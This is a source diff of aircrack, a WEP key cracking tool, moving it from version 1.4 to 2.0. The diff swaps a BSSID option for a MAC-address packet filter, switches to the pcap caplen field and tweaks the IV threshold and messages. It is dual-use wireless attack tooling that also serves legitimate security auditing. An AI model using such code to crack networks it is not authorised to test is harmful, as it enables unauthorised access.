@@ -43,26 +43,26 @@
 char usage[] =
 
 "\n"
-"  aircrack 1.4 - (C) 2004 Christophe Devine\n"
+"  aircrack 2.0 - (C) 2004 Christophe Devine\n"
 "\n"
 "  usage: %s [options] <pcap filename(s)>\n"
 "\n"
-"      -b <bssid> : identifier of the network to crack\n"
 "      -d <start> : debug - specify beginning of the key\n"
 "      -f <fudge> : bruteforce fudge factor (default: 2)\n"
 "      -k <keyid> : WEP KeyID to crack (0-3, default: 0)\n"
 "      -n <nbyte> : WEP key length (5 / 13, default: 13)\n"
+"      -m <maddr> : MAC address to filter usable packets\n"
 "      -p <nfork> : SMP support: # of processes to start\n"
 "\n";
 
 /* command-line parameters */
 
 int debug_lvl = 0;              /* # of keybytes fixed  */
-int bssid_set = 0;              /* BSSID check flag     */
+int macfilter = 0;              /* BSSID check flag     */
 int keyid_set = 0;              /* KeyID check flag     */
 int stability = 0;              /* unstable attacks on  */
 unsigned char debug[13];        /* user-defined wepkey  */
-unsigned char bssid[6];         /* user-defined BSSID   */
+unsigned char maddr[6];         /* MAC address filter   */
 int keyid  =  0;                /* WEP KeyID            */
 int weplen = 13;                /* WEP key length       */
 int ffact  =  2;                /* fudge threshold      */
@@ -186,7 +186,7 @@ int read_ivs( char *filename )
         if( safe_read( infile, &pkh, n ) != n )
             break;
 
-        n = pkh.len;
+        n = pkh.caplen;
 
         if( safe_read( infile, buffer, n ) != n )
             break;
@@ -201,16 +201,16 @@ int read_ivs( char *filename )
 
             n = *(int *)( h80211 + 4 );
 
-            if( n < 8 || n >= (int) pkh.len )
+            if( n < 8 || n >= (int) pkh.caplen )
                 continue;
 
-            h80211 += n; pkh.len -= n;
+            h80211 += n; pkh.caplen -= n;
         }
 
         /* minimum encrypted data packet size: 40 = 24  *
          * (802.11) + 4 (IV, KeyID) + 8 (LLC) + 4 (FCS) */
 
-        if( pkh.len < 40 ) continue;
+        if( pkh.caplen < 40 ) continue;
 
         /* is it an encrypted data packet ? */
 
@@ -219,18 +219,19 @@ int read_ivs( char *filename )
 
         /* check if the BSSID and the KeyID match */
 
-        switch( h80211[1] & 3 )
+        if( macfilter == 0 )
         {
-            case  0: i = 16; break;      /* DA, SA, BSSID  */
-            case  1: i =  4; break;      /* BSSID, SA, DA  */
-            case  2: i = 10; break;      /* DA, BSSID, SA  */
-            default: i =  4; break;      /* RA, TA, DA, SA */
-        }
+            macfilter = 1;
 
-        if( bssid_set == 0 )
-        {
-            bssid_set = 1;
-            memcpy( bssid, h80211 + i, 6 );
+            switch( h80211[1] & 3 )
+            {
+                case  0: i = 16; break;      /* DA, SA, BSSID  */
+                case  1: i =  4; break;      /* BSSID, SA, DA  */
+                case  2: i = 10; break;      /* DA, BSSID, SA  */
+                default: i =  4; break;      /* RA, TA, DA, SA */
+            }
+
+            memcpy( maddr, h80211 + i, 6 );
 
             if( keyid_set == 0 )
             {
@@ -240,11 +241,14 @@ int read_ivs( char *filename )
                 
             printf( "\33[2KChoosing first encrypted BSSID"
                     " = %02X:%02X:%02X:%02X:%02X:%02X (KeyID %d)\n",
-                    bssid[0], bssid[1], bssid[2],
-                    bssid[3], bssid[4], bssid[5], keyid );
+                    maddr[0], maddr[1], maddr[2],
+                    maddr[3], maddr[4], maddr[5], keyid );
         }
         else
-            if( memcmp( bssid, h80211 + i, 6 ) )
+            if( memcmp( h80211 +  4, maddr, 6 ) &&
+                memcmp( h80211 + 10, maddr, 6 ) &&
+                memcmp( h80211 + 16, maddr, 6 ) &&
+                memcmp( h80211 + 24, maddr, 6 ) )
                 continue;
 
         if( keyid_set )
@@ -302,11 +306,11 @@ void show_stats( int B )
     et_m = ( delta - et_h * 3600 ) / 60;
     et_s =   delta - et_h * 3600 - et_m * 60;
 
-    printf( "\33[2;%dH\33[1maircrack 1.4\33[0m\n\n",
+    printf( "\33[2;%dH\33[1maircrack 2.0\33[0m\n\n",
             ( ws.ws_col - 12 ) / 2 ); 
 
     printf( "   * Got %7ld%c unique IVs | fudge factor = %d\n",
-            nb_ivs, ( nb_ivs < 786432 ) ? '!' : ' ', ffact );
+            nb_ivs, ( nb_ivs < 600000 ) ? '!' : ' ', ffact );
 
     printf( "   * Elapsed time [%02d:%02d:%02d] | tried "
             "%ld keys at %ld k/m\n", et_h, et_m, et_s, tried,
@@ -831,7 +835,7 @@ void my_sighandler( int signum )
 
     if( signum == SIGCHLD )
     {
-        printf( "got unexpected SIGCHLD, exiting.\n" );
+        printf( "\ngot unexpected SIGCHLD, exiting.\n" );
         kill( 0, SIGTERM );
         exit( FAILURE );
     }
@@ -855,36 +859,12 @@ int main( int argc, char *argv[] )
 
     while( 1 )
     {
-        int option = getopt( argc, argv, "b:d:f:k:n:p:s:" );
+        int option = getopt( argc, argv, "d:f:k:n:m:p:s:" );
 
         if( option < 0 ) break;
 
         switch( option )
         {
-            case 'b':
-
-                i = 0;
-                s = optarg;
-
-                while( sscanf( s, "%x", &n ) == 1 )
-                {
-                    if( n < 0 || n > 255 )
-                        goto usage;
-
-                    bssid[i] = n;
-
-                    if( ++i == 6 ) break;
-
-                    if( ! ( s = strchr( s, ':' ) ) )
-                        break;
-
-                    s++;
-                }
-
-                if( i != 6 ) goto usage;
-                bssid_set = 1;
-                break;
-
             case 'd' :
 
                 i = 0;
@@ -940,6 +920,30 @@ int main( int argc, char *argv[] )
 
                 break;
 
+            case 'm':
+
+                i = 0;
+                s = optarg;
+
+                while( sscanf( s, "%x", &n ) == 1 )
+                {
+                    if( n < 0 || n > 255 )
+                        goto usage;
+
+                    maddr[i] = n; i++;
+
+                    if( i == 6 ) break;
+
+                    if( ! ( s = strchr( s, ':' ) ) )
+                        break;
+
+                    s++;
+                }
+
+                if( i != 6 ) goto usage;
+                macfilter = 1;
+                break;
+
             case 'p' :
 
                 if( sscanf( optarg, "%d", &nfork ) != 1 )
